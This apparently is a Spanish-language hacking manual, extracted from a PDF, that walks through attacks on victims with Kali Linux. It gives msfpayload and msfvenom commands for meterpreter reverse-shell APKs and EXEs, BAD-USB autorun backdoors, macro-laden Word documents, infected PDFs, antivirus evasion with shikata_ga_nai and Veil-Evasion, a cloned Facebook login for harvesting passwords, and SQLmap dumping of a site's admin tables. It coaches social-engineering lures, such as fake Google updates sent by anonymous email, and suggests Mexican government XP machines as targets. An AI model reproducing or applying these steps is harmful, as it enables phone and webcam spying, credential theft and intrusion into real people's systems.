Está en la página 1de 44

1

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

3
LIBRO ESCRITO POR: D1n-r3X {Hacker tico}
El Autor de nacionalidad Mexicana
declara que no dar informacin personal
de su verdadero nombre y datos personales
ya que por motivos personales y legales
no se har responsable por el uso de este libro,
este libro no es con fines de lucro, es una redaccin
de los conocimientos del autor D1n-r3x
Sistemas operativos usados en estelibro
Windows 7 Ultimate x64 bits (sistema primerio)
Kali Linux 1.0.9 x64bits (sistema virtual)
Parrot-Security os 1.6 x86bits (sistema virtual)

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

COMANDOS BASICOS DE METASPLOIT


Primero veremos como iniciar los servicios de metasploit de forma manual, Ya que en algunos casos es ms complejo, pero
nos facilitara trabajo y tiempo.

Los comandos a iniciar son los siguientes


# service postgresql start
#service metasploit start
#msfconsole
[Con estos comandos iniciamos la consola de metasploit]
es necesario iniciar siempre os servicios de metasploit ya que sin ellos no iniciara a la hora de hackear,
Tambin los podemos iniciar de la siguiente forma.
Aplicaciones/Herramientas de explotacin/metasploit/metasploit community pro

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

HACKEAR ANDROID CON APK


[Desde una consola de Metasploit]

Con los siguientes comandos que aparecen se crea un apk maliciosa


msfpayload Android/meterpreter/reverse_tcp LHOST=198.66.1.0 LPORT=8080 x > malware.apk /root/Desktop/
LHOST Aqu vamos a poner la IP de la maquina kali Linux
LPORT Aqu va el puerto al cual se va a conectar la apk maliciosa
/root/Desktop Guardara el apk en el escritorio de kali Linux
La IP de Linux la podemos ver con el comando
#ifconfig
NOTA : Para que este mtodo funcione correctamente el telfono con cualquier versin de Android debe de dejar instalar
aplicaciones con orgenes desconocidos, ya que no tiene forma de autor ni licencia.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

en esta pagina Http://www.wetransfer.com


podemos enviar archivos de forma annima
o bien lo podemos enviar desde un correo ya sea Gmail,yahoo,Hotmail etc.
Add files, aqu cargamos el malware.apk
Friends email el email de usuario Android al cual le enviaremos el apk maliciosa,
bueno es importante que sea el correo que tiene como cuenta en google play store
Your email, aqu puede ir un correo falso, ejemplo malware@anonymous.com
Message, Aqu es importante que tenga algo por ejemplo una actualizacin
de google para el telfono, alguna noticia o promocin, etc.
El apk la tiene que intalar la victima en su telfono Android, no importa la versin
ya una vez que la victima lo haya instalado y asu vez abra la aplicacin nos dara
acceso remoto a todo el telfono, contactos, llamadas, mensajes, fotos.
Tambien podremos manipular la cmara y micrfono a nuestra veneficio

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

EXPLOIT CARGADO EXITOSAMENTE


Ya que la victima descargo la aplicacin tambin nos acaba de dar acceso remoto a su telfono
como vemos aqu con el comando sysinfo, vemos la versin de Android que tiene el telfono

Como podemos ver aqu algunos de los comandos


para el acceso al telefono
en este caso se uso el comando webcam_snap 2
El cual no toma una foto con la cmara y la guarda en
la carpeta /root/ de kali Linux
webcam_snap es la cmara del telefono en
este caso la 2 que es la cmara trasera del telefono, y
la 1 es la cmara delantera con la cual podemos ver a
la persona detrs del telefono.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

BACKDOOR
BAD-USB
METODO 1
{Puerta trasera}
Archivo bat indetectable
& en USB autoejecutable
Iniciamos setoolkit con el comando
setoolkit, en una nueva terminal
ya iniciado seleccionamos la opcin 1)
Social engineering attacks
Despues la opcin
10) Powershell attacks vectors
Despues la opcin
1) Powershell alphanumeric Shell code
injector

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

Como vemos aqu ya hay 2 terminales una de setoolkit y otra nueva por debajo la cual es la ruta de archivo bat malicioso
En setoolkit ponemos la IP de kali, y el puerto
Despues en la opcin de YES para iniciar el metasploit
y en la otra terminal como podemos ver es la ruta del archivo bay en formato txt,
la ruta es la siguiente
# cd /root/.set/reports/powershell
# ls {para ver la lista de archivos}
# cp x86_powershell_injention.txt /root/Desktop
con el comando cp copiamos el bat al escritorio para editarlo a .bat
para eso hay que renombrar el .txt por .bat

Como vemos ya est a la escucha esperando el BAT-USB


para hacer esto es necesario convertir el bat a exe en windows en este caso en windows 7, en mi maquina que se usara como
victima y acerlo auto-ejecutable he invisible
al ojo humano, ya el sistema puede que lo detecte pero no haga nada, este bat fue probado con antivirus y es indetectable , ya
que algunos exploits de kali, ya son muy comunes y detectados pero este no.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

10

Pagina del 1er programa


http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
Aqu est la primer parte que es convertir el BAT a EXE
para que el otro programa lo haga auto ejecutable al momento de conectar
El exe debe de guardarse en la memoria, el bat se puede borra o guardar como ustedes gusten
en este programa podemos ponerle icono al exe para que se vea ms aceptable a la vctima
yo use un icono de CMD ya que es el programa que abrir al momento de insertar la usb en el ordenador
El 2do Programa es de licencia asi que dejare la pgina oficial para evitar estragos en mi contra.
ya que el programa crea archivos nuevos que pueden ser modificados ya creados, los archivos no son detectables ya que el
programa los uso como archivos importantes de la memoria usb
http://www.samlogic.net/demos/demos-register-usbac.htm
NOTA: setoolkit tambin tiene una funcin de crear un archivo auto ejecutable pero el antivirus lo detecta por lo cual
yo tome en cuenta eso y mejor convert el archivo para ser indetectable ante la mayora de los antivirus

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

11

Una vez creados y ocultados de


la computadoras comunes solo
falta extraer la USB y volverla a
poner para ver como corre
nuestro virus
Recuerden que metasploit se
qued a la esperando el payload
as que vamos a drselo

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

12

Aqu se ejecut al momento de conectar el USB


y de lado izquierdo esta meterpreter esperando a que termine de cargar el PAYLOAD

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

13
Para iniciar Meterpreter usamos el comando
sessions i 1
claro ya viendo que nos carg el exploit con xito

como podemos ver hay que mover el virus de la memoria a la computadora por si nos desconectan la usb
usaremos los comandos ps, para ver procesos id y migrate N de proceso id

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

14

OFFICCE BACKDOOR
{shikata_ga_nai} {indetectable}

Como podemos ver aqu creamos un payload con extensin EXE, para despus proceder a convertirlo a VBA y poder inyectar
el cdigo en el documento de office
escriben el siguiente cdigo que se muestra en la imagen de arriba
msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.64.134 LPORT=4444 ENCODING=shikata_ga_nai x >
/root/Desktop/docx.exe
Este nos creara un EXE en el escritorio
No olvides que los comando LHOST, LPORT
se configuran a nuestra maquina Linux, es decir la IP en LHOST y el puerto deseado.
En esta captura de abajo veremos los siguientes comandos
locate exe2vba.rb
cd /usr/share/metasploit-framework/tolos/
ruby exe2vba.rb /root/Desktop/docx.exe /root/Desktop/docx.vba
{este ltimo comando nos dar nuestro archivo VBA}

Aqu ya creado el .EXE con los siguientes comandos se convertir a un archivo .VBA para poder leerlo y encriptarlo en una
macro de office, y ya creado lo pasamos el archivo .VBA a una memoria USB para proseguir con la macro.

Nos dirigimos a vista, y creamos


una nueva macro, elegimos el
nombre que preferimos,
guardan la macro en la casilla de
guardar
AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

15
Despus que este la macro lista seguiremos con la inyeccin del texto codificado por shikata_ga_nai
IMPORTANTE, al copiar el texto se crearan varias hojas es recomendable cambiar el tamao y color
en este casa tamao 1 color blanco de preferencia para evitar que la vctima ver a algo inusual

El archivo lo guardamos como Documento Word con macro habilitada la extensin de archivo es .docm
ya guardado el archivo lo cerramos y se enva a la vctima, iniciamos metasploit
con las configuraciones de handler
y el puerto y la misma IP con la creamos el archivo exe
esperamos a que la vctima abra el documento y listo ya tenemos sesin de meterpreter
estas captura se hicieron desde mi pc con una mquina virtual para hacer ambos procesos a la vez.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

16

PDF INFECTADO
Mtodo 1
{puede ser detectado por algunos antivirus}

cargamos la consola de metasploit, ya previo los servicios de posgresql y metasploit para iniciar la consola
una vez iniciado metasploit usamos el comando
use exploit/Windows/fileformat/adobe_pdf_embedded_exe
NOTA: antes de seguir necesitamos un PDF que no est infectado , ejemplo un archivo falso con informacin que a la vctima
le parezca interesante ya sea una revista por etc., depende de la vctima en este caso usare un archivo que sera el libro pero
en formato PDF, esto es solo para demostrar este exploit el archivo publicado no tendr ningn tipo de malware
ya que este PDF es una prueba del libro sin terminar.
Este exploit lo que ara en inyectar el cdigo en un PDF para que cuando la vctima lo abra nos de acceso a su sistema sin
darse cuenta es difcil que la vctima se d cuenta dado que con el mtodo de documento de office puede que se d cuenta
por la extensin del archivo ya que es una extensin .docm
{documento con macro habilitada}
prosigamos con este otro mtodo.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

17

set filename D1n-r3X.pdf [ pueden poner el nombre que se les de en mente pero debe de terminar en .pdf ]
set infilename /root/Desktop/LA BIBLIA.pdf [las comillas dobles son solo si el archivo tiene algn espacio en el nombre,
sino es as no son necesarias ]
set outputpath /root/Desktop/ [ es para copiar el contenido del PDF al pdf infectado ]
set lhost ip de Linux aqu
set lport 4444 [ este puede varia depende del puerto abierto en la pc victima]
exploit [ aqu nos generara el PDF infectado en la carpeta /root/.msf4/local/
en una nueva terminal ejecutamos el comando siguiente

Podemos apreciar aqu el PDF original y el PDF infectado a simple vista parecen iguales
con los siguientes comandos copiamos el contenido al escritorio de kali Linux
cd /root/.msf4/local
ls [ lista de archivo en carpeta de local ]
cp D1n-r3X.pdf /root/Desktop [ comando de copiar archivo con ruta al escritorio]

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

18
Una vez hecho lo siguiente configuramos nuestro metasploit a la escucha para que espere el payload del PDF infectado

Por algn motivo no me cargo el exploit pero el AV lo detecta como malware

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

19

PDF INFECTADO
Mtodo 2

Comandos a seguir
use exploit/Windows/fileformat/coolpdf_image_stream_bof
set payload Windows/reverse_tcp
set lhost
set lport
exploit
{el PDF se guarda en la carpeta root/.msf4/local
con el nombre de msf.pdf}

Con los siguientes comando copiamos el archivo PDF a nuestro escritorio, como vemos en la imagen se ha creado con xito,
ya una vez copiado al escritorio ya sea que lo mandemos por mensaje o por correo annimo, yo en este caso infectare a la
vctima pasando el archivo a una memoria USB, pero ustedes puede usar su ingenio para ver el mtodo que le convenga ms
para lograr que el payload se cargue correctamente.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

20

HACKEO DE
FACEBOOK
{SETOOLKIT}
Abrimos setoolkit con el comando
#setoolkit
una vez abierto selecionamos la
opcin 1 Ataque de ingeniera
social, previo a esto
selecionamos la 2 ataque a
vectores de sitio web, una vez
hecho esto proseguimos con la
opcin 3 Ataque a credenciales
con el metodo havester.
una vez finalizado ponemos
nuesta ip de kali Linux y la pagina
la cual se desea optener los
datos de usuario en este caso
ser la de Facebook , esto lo que
ara es crear una pagina temporar
con el servidor de apache
abrimos una nueva terminal
para ello es necesario iniciar los
servicios de apache con el
comando # service apache2 start.
ya una vez hecho esto
mandamos el url el cual en este
caso seria la ip de kali Linux la
cual ser una clonacin de la
pagina de Facebook login.
{ el usuario ingresa sus datos y
obtendremos su correo y
contrasea}

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

21

En cuanto la victima aceda a la pgina clonada no enva sus datos


personales como podemos ver en la imagen de la derecha
tenemos el correo y la contrasea
que se escribi en la pgina de Facebook
este archivo se guarda en la carpeta var/www
es un archivo de texto .txt

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

22

HACK WINDOWS THEME


{SOLO PARA WINDOWS XP SP3}

Este metodo solo funciona en windows xp sp3 ya que tiene una vulnerabilidad a este exploit el cual no es detectado como
malware en Sistema xp.
{ la mayor parte de computadoras gubernamentales y de a sociaciones de gobierno en mexico tiene dicho sistema xp asi que
alos interesados les recomiendo un anlisis de las paginas de gobierno con FOCA, el cual es un programa de anlisis de
metadatos, pero no me enfocare en ese tema ya que es bajo Windows y este libro ser exclusivo para kali Linux}

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

23

INYECCION DE BACKDOOR
EN CUALQUIER ARCHIVO EXE
usaremos el codificador shikata_ga_nai
para la inyeccin inversa de el payload en nuestro
archivo ese, en este caso usaremos la calculadora
de la maquina victima la cual tiene windiwows 7
-----------------------------------------------------------Nesesitamos el archivo exe el cual lo podemos encontrar
dando click derecho y en abrir ubicacin del archivo
copiamos el archivo a una usb para poder modificarlo
y cargar el payload en un nuevo archivo malicioso
------------------------------------------------------------------------------Una vez hecho esto nos pasamos a nuestro sistema kali Linux
para seguir con lo siguiente,
la codificacin con el exe a el exe cargado con el payload

Con los siguientes comandos en una terminal

msfpayload Windows/meterpreter/reverse_tcp LHOST=180.880.11.1 LPORT=4444 R | msfencode e


x86/shikata_ga_nai c 5 t exe x /root /Desktop/calc.exe o /root /Desktop/calc2.exe
-------------------------------------------------------------------------------------------------------------------------------------------------------------------El archivo se guarda en el escritorio de kali, este mtodo puede emplearse con auto ejecucin como en el archivo bat, ya que
es una aplicacin,se puede hacer con un juego exe, y por supuesto cambiar el icono para que caiga la victima
-------------------------------------------------------------------------------------------------------------------------------------------------------------------Despues de esto pasamos el payload calc2.exe a la memoria usb, ya en ello hay que hacer que la victima lo ejecute
{EJEMPLO} > Es una nueva calculadora cientfica de Microsoft , que tiene mejor rendimeinto del sistema y adems
crea alternativas de algebra y algoritmos de fsica, etc.< (Solo funciona en Windows xp )

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

24

BACKDOOR
BAD-USB
METODO 2

{solo Windows xp}

Este mtodo es con el programa SETOOLKIT


a diferencia de el mtodo uno esta opcin es
solo con la herramienta de SET, nos crea el
archivo .exe junto con el archivo .inf (los
comandos del autoejecutable en usb,cd,dvd)

Despues de la opcin 1 Fileformat exploit, pondremos la ip


de kali, seleccionamos la opcin
12 adobe pdf embedded exe
social engeneering
al teminar eso ponemos la ruta
de nuestro archivo pdf original
al cual se creara una copia con
un inyecion maliciosa, en este
caso la ruta a seguir es
/root/Desktop/kali.pdf
NOTA: yo usare meterpreter a
64bits, pero en su caso es
probable que que utilicen a
x32bits, eso se vera en la
siguiente imagen.

En su caso usen la opcin 2 , yo usare la 5 ya que ser a x64bits


solo si la vicma corre un sistema a x64bits , por lo regular son maquinas sensillas a esepsion de windows8 y 10 que usan
sistemas de x64, xp,vista 7 casi siempre son a x32bits
AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

25

En la ruta de cd /root/Desktop/.set/ hay un archivo llamado template.pdf y uno llamado autorun.inf, ambos se deben de copiar a
nuestro pendrive para la ejecucin de nuestro payload de forma remota.
Con este comando vemos los
archivos creados de setoolkit ya
una vez creados y copiado damos
en la opcin yes, para cargar
nuestro metasploit precargado
gracias a set
Esta vulnerabilidad es nicamente para sistemas operativos con Windows xp
se mal, pero no tanto ya que las mayor parte de las empresas en todo Mxico y el mundo aun usan este sistema ya
sea por programas de la misma empresa que por lo general hacen programas de mano factura, tales empresas ya
sea de gobierno, o de alguno grande o mediana empresa, inclusive de alguna escuela.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

26

Exploit Usando Msfvenom Windows 7

msfvenom p windows/meterpreter/reverse_tcp e x86/shikata_ga_nai i 5 b \x00 LHOST=180.188.78.1 LPORT=443


f exe > /root/Desktop/gta.exe
{Este es el comando para crear nuestro archive con shikata ga nai, en este caso el gta.exe ya que tengo algunos iconos del
gta, y talves lo pase como un crack para no cd

Como vimos antes ya creado el exploit vamos a nuestro metesploit y usamos los siguientes comandos
use exploit/multi/handler
set payload Windows/meterpreter/reverse_tcp
set lhost
set lport

Analizado en virus total. Es detectable por la mayora de los antivirus, Este exploit no necesita permisos de administrador
AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

27

CODIFICACION DE TROJANO EN BINARIO

msfpayload windows/meterpreter/reverse_tcp LHOST=ip de Linux aqu LPORT=4444 X > /root/Desktop/msf.exe


Este es el trojano normal sin codificacion
msfpayload windows/meterpreter/reverse_tcp LHOST= ip aqu LPORT=444 R | msfencode e x86/countdown c 2
x86/shikta_ga_nai c 2 > /root/Desktop/msfencoded.exe
Este otro esta codificado con shikata_ga_nai
Los podemos usar con la consola de metasploit y exploit/multi/handler y los parmetros que ya conocemos
aqu la detecion de los antivirus en virustotal.

Este es el primer archivo sin codificar

Este es el segundo archivo, hay otras alternativas de codificacin pero en este caso se provo la de shikata_ga_nai que no
sirve ya que la mayora de los antivirus lo detecta, pero no procupen que en este libro estar lo que usted busca para su
veneficion con o sin fines velignos a la sociedad.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

28

EVASION DEL ANTIVIRUS CON VEIL-EVASION


{Instalacion de veil & configuracin}

Esto para actualizar nuestro kali Linux antes de la instalacion de veil-evasion


1- apt-get update
2- apt-get upgrate

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

29

------------------------------------------------------------------------------------------------------------------------------------------------------------------------Aqu clonamos la pgina de veil-framework, y seguimos con la instalacin


Aparecer un cuadro de dialogo escribimos y para seguir
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------------------------------------------------------------Esto puede demorar unos minuto en lo que se descarga los archivos necesarios que utiliza Veil-Evasion
------------------------------------------------------------------------------------------------------------------------------------------------------------------------AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

30

despus de la descarga de paquetes inicia la


instalacin de python,y otras 2 aplicaciones
ms los pasos para instalar las aplicaciones
son iguales a los de windows, y son
necesarios para Veil-Evasion,
------------------------------------------------------------NOTA: Esto demora unos minutos , yo uso el
sistema en una mquina virtual la cual me
permite guardar las configuraciones y
descarga de kali, en el caso de hacer estos
pasos en dvd, usb, no guarda nada,

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

31

Terminado estas instalaciones, procedemos a ejecutar


nuestro programa Veil-Evasion
en la terminar que estbamos usando usamos el comando
cd .. {esto nos regresara una carpeta atrs a la carpeta de
Veil, y escribimos el siguiente comando
python Veil-Evasion.py esto nos ejecutara el programa ya
completo.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

32

Es la misma instalacin, para iniciar veil, hay que usar el comando { chmod +x Veil-Evasion.py , este comando debe de ir
antes de iniciarlo con python, para descargar python usaremos el comando, apt-get install python-mechanize }

Con el comando list, veremos


los payloads disponibles con
esta versin de veil tiene 37
disponibles, para ser
indetectables probaremos
algunos de ellos, Veil
Framework , es una
herramienta muy similar a
metasploit, pero su
funcionalidad es crear
payload que los antivirus no
eliminen y adems en una
manera ms sencilla de usar.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

33

Despus del comando list, seleccionamos el payload nmero 36), ya que la codificacin de este no es detectada inclusive es
mejor que el bat de setoolkit, lo configuramos con los siguientes parmetros:
set LHOST ip de Linux
set LPORT 4444 {Esto puede variar}
generate {esto nos gener nuestro archivo exe

Aqu hay dos opciones


1 press [enter] for payload { Esta opcin nos genera el payload con el nombre en las comillas }
2 Aqu podremos un el nombre el cual se le va a dar a nuestro virus { En este caso, payloadfinal}

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

34

Ya creado el payload se guarda en la carpeta siguiente de kali Linux


cd /root/veil-output/compiled/payloadfinal.exe
{aqu ejecutare el payload en un windows para provarlo}

Se ejecuta sin necesidad de control de cuentas de usuario ya que en windows 7 & 8 tienen activada esta funcin
el payload no carga nada, a simple vista, pero lo que la victima no sabe esque no dio acceso total a su maquina.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

35

Configuramos el exploit/multi/handler
use exploit/multi/handler
set lhost {ip Linux}
set lport 4444
set payload windows/meterpretera/reverse_tcp
exploit
El exploit cargo al instante al momento de su ejecucin, y adems es detectable por 2 de los 56 antivirus que nos permite
analizar virus total.

Este imagen de abajo es de mi avast, y tampoco lo detecta como amenaza de ningn tipo

NOTA: Hay varios payloads en Veil-Evasion


pero uno de los mejores que he probado es
este ya que no hay antivirus comercial que lo
pueda detectar adems como ava dicho no
requiere permisos al ejecutar, y no ejecuta
cmd, por lo cual es perfecto para hacer algn
trabajo por Etica 3:)>

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

36

Iexplorer update
{PARROT-SEC}
Nota algunos antivirus
pueden bloquear esto

Una vez hecho esto con el commando use exploit/windows/browser/ie_cgenericelement_uaf, proceguimos ala configuracion de
nuestro exploit con el commando show options y cambiaremos algunas opciones como SRVHOST, SRVPORT

Despues de configurar el SRVHOST con nuestra ip de parrot-sec, proseguimos a configurar nuestro objetivo en este caso
windows 7, configuramos con el siguiente comando. Show targets , Despues con set TARGET 4
Despues de set LHOST , usamos el comando exploit , y enviamos el enlace malintecionado, y listo.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

37

WEPSPLOIT HOMBRE EN MEDIO MITM

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

38
Con el comando
use ( selecionamos el modulo, similar a
metasploit)
vamos a usar el modulo network/mitn
Despues con el comando show options
Veremos las opciones a configurar
en este caso ser el router y la ip de la pc
vitima
tambin se puede configurar el sniffer

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

39

SQLMAP
(Ataque a paginas web)

Con el comando siguiente podemos analizar la pagina simpre y cuando la pagina sea vulnerable con php?=
sqlmap u www.pagina-vulnerable.com/etc.php?=27 dbs
En este comando si la pagina es vulnerable nos aparecer un dialogo con los siguientes trminos
(Y/N) En este caso usaremos la Y y poseguimos a presionar ENTER.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

40

Ya utilizando la opcin de yes en abreviacin y, veremos que la pagina carga las Bases de Datos
de qui vamos a seleccionar una, Este puede variar depende de la pagina en algunas puede mostrar mas bases de datos o
bien puede que solo salga una,
Este pagina me a mostrado 2 Bases de Datos,
(Esto esta en la pagina siguiete)

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

41

Como vemos en la imagen, Tenemos 2 bases de datos disponibles, vamos seleccionar la bas, ampos_ampoweb
con el siguiete orden de comandos
sqlmap u www.pagina-vulnerable.com/etc.php?=27 D ampos_ampoweb tables
Explicacion breve.
-D ( Este comando es la orden a ejecutar de la base de datos seleccionada)
--tables (En este campos ejecutamos un orden de tablas de la base de datos)

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

42

Aqu podemos ver que son 30 tablas disponibles..

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

43
Aqu podemos ver las tablas disponibles en este caso vamos a seleccionar la
siguiente tabla

Con el comando que se mostrara en la pagina siguiente nos va a mostrar las columnas de
administracin de la pagina.
el comando es el siguiente
sqlmap u www.pagina-vulnerable.com/etc.php?=27 D ampos_ampoweb T
admin_contenidos --columns

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]

44

AUTOR DEL LIBRO:

D1n-r3X

[Hacker tico]